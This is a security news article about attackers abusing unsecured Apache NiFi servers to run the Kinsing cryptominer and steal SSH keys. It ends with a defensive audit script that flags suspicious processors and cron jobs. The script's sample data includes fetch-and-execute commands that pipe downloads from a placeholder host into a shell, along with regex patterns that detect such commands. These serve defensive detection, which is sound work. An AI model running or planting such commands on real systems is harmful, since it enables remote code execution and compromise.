Indicators of the ongoing campaign were first spotted by the SANS Internet Storm Center when, on May 19th, their distributed sensor network detected a significant spike in requests for “/nifi.”
After redirecting some of the requests to their honeypot system running the latest version (v1.21.0) of the data processing and distribution solution, they discovered that someone is:
- Accessing unsecured installations
- Adding scheduled processors to retrieve and install scripts that install a cryptocurrency miner (Kinsing) and, in some cases, attempt to find other connected targets by searching the server for SSH credentials
Both scripts are kept in memory (i.e., they are not saved to the file system).
The first one attempts to do things like disable the firewall and monitoring tools, find and terminate other cryptomining tools, install the Kinsing cryptominer, make standard temporary directories immutable (likely to prevent additional exploits), and more.
The second one tries to determine the victim’s external IP address, collects SSH keys from the system, and tries to connect to other hosts and deploy the script delivering the cryptominer.
“The requests arrived almost exclusively from 18.104.22.168. In addition to scanning for NiFi, the same IP also sends requests for /boaform/admin/formLogin. Various routers use this URL as a login page and are often scanned for weak passwords and other vulnerabilities,” said Dr. Johannes Ullrich, Dean of Research at the SANS Technology Institute.
He told Help Net Security that, based on the lateral movement they saw, he thinks the attacker is likely using the routers as a stepping stone.
“Routers make bad cryptomining servers. Cryptomining may be what they end up doing if the lateral movement doesn’t get them anywhere (like our honeypot was on an isolated network with nowhere to go to).”
How many unsecured Apache NiFi instances are there?
Dr. Ullrich says he found around 100, but there are likely more. Many of the discovered unsecured instances are hosted with cloud providers (e.g., Azure).
“Due to its use as a data processing platform, NiFi servers often have access to business-critical data. NiFi presents an attractive target for anyone who wants to steal, modify or delete the data,” he says.
But they are also configured with larger CPUs to support data transformation tasks, meaning that they can also easily support cryptomining activities.
SANS ISC has provided the malicious scripts and indicators of compromise: malicious cron jobs for persistence, odd processors in the NiFi configuration, IP addresses, and hashes of the scripts and the cryptominer.
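Two of the indicators named above, unexpected processors in the NiFi flow and cron jobs used for persistence, lend themselves to a quick automated audit. The script below is an added example written for this article; it is not SANS ISC's tooling or part of Apache NiFi. It walks a flow snapshot shaped like the JSON that NiFi's `/nifi-api/flow/process-groups/{id}` endpoint returns and flags processor types that can execute host commands (`ExecuteProcess`, `ExecuteStreamCommand`, `ExecuteScript`), then scans crontab text for fetch-and-execute patterns. The sample flow, the placeholder URL and the sample crontab are constructed for the demonstration; the property names (`Command`, `Command Path`, `Script Body`) are the real ones those processors use.

```python
"""Audit helpers for two NiFi compromise indicators: command-executing
processors in the flow and download-and-run cron jobs for persistence.
Added example; not SANS ISC or Apache NiFi code. Sample data is constructed."""
import json
import re

# Processor types that run arbitrary commands or scripts on the NiFi host.
# They have legitimate uses, so a hit is a review prompt, not proof of compromise.
COMMAND_PROCESSOR_TYPES = {
    "org.apache.nifi.processors.standard.ExecuteProcess",
    "org.apache.nifi.processors.standard.ExecuteStreamCommand",
    "org.apache.nifi.processors.script.ExecuteScript",
}

# Heuristics for cron-based persistence: a fetch piped into a shell, a shell
# wrapping a fetch, or anything launched from world-writable temp directories.
CRON_PATTERNS = [
    re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b"),
    re.compile(r"\b(ba)?sh\s+-c\s+['\"]?\s*(curl|wget)\b"),
    re.compile(r"(/tmp/|/dev/shm/)\S*"),
]


def flag_processors(flow_snapshot):
    """Return a list of dicts describing command-executing processors.
    flow_snapshot: dict shaped like NiFi's process-group flow response."""
    findings = []
    for proc in flow_snapshot["processGroupFlow"]["flow"]["processors"]:
        comp = proc["component"]
        if comp["type"] not in COMMAND_PROCESSOR_TYPES:
            continue
        config = comp.get("config", {})
        props = config.get("properties", {})
        findings.append({
            "id": comp["id"],
            "name": comp["name"],
            "type": comp["type"].rsplit(".", 1)[-1],
            "state": comp.get("state"),
            "schedule": config.get("schedulingPeriod"),
            # Whichever property carries the thing that actually gets executed.
            "command": props.get("Command") or props.get("Command Path")
                       or props.get("Script Body"),
            "arguments": props.get("Command Arguments"),
        })
    return findings


def flag_cron_lines(crontab_text):
    """Return (line_number, matched_pattern, line) for suspicious cron entries."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        for pattern in CRON_PATTERNS:
            if pattern.search(entry):
                findings.append((lineno, pattern.pattern, entry))
                break
    return findings


# Constructed sample: one benign fetch processor and one ExecuteProcess that
# pulls a script from a placeholder host every 10 seconds.
SAMPLE_FLOW = {"processGroupFlow": {"id": "root", "flow": {"processors": [
    {"component": {"id": "p1", "name": "GetHTTP",
                   "type": "org.apache.nifi.processors.standard.GetHTTP",
                   "state": "RUNNING",
                   "config": {"schedulingPeriod": "1 min", "properties": {}}}},
    {"component": {"id": "p2", "name": "ExecuteProcess",
                   "type": "org.apache.nifi.processors.standard.ExecuteProcess",
                   "state": "RUNNING",
                   "config": {"schedulingPeriod": "10 sec", "properties": {
                       "Command": "/bin/bash",
                       "Command Arguments":
                           "-c 'curl -s http://placeholder.invalid/x.sh | bash'"}}}},
]}}}

# Constructed sample crontab: a normal backup job and a fetch-and-run entry.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://placeholder.invalid/k.sh | sh
"""

if __name__ == "__main__":
    print(json.dumps(flag_processors(SAMPLE_FLOW), indent=2))
    for lineno, pat, entry in flag_cron_lines(SAMPLE_CRONTAB):
        print(f"cron line {lineno} matched {pat!r}: {entry}")
```

To run this against a live instance, fetch the root process group with an authenticated `GET /nifi-api/flow/process-groups/root` and pass the parsed JSON to `flag_processors`; for cron, feed it the output of `crontab -l` for each user and the contents of `/etc/cron.d`. Neither check replaces the hashes and addresses SANS ISC published, but both are cheap to run across a fleet and catch the shape of the persistence the article describes.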
In general, though, Apache NiFi instances should not be internet-facing and access to them should be properly secured (as advised and instructed in the official sysadmin’s guide).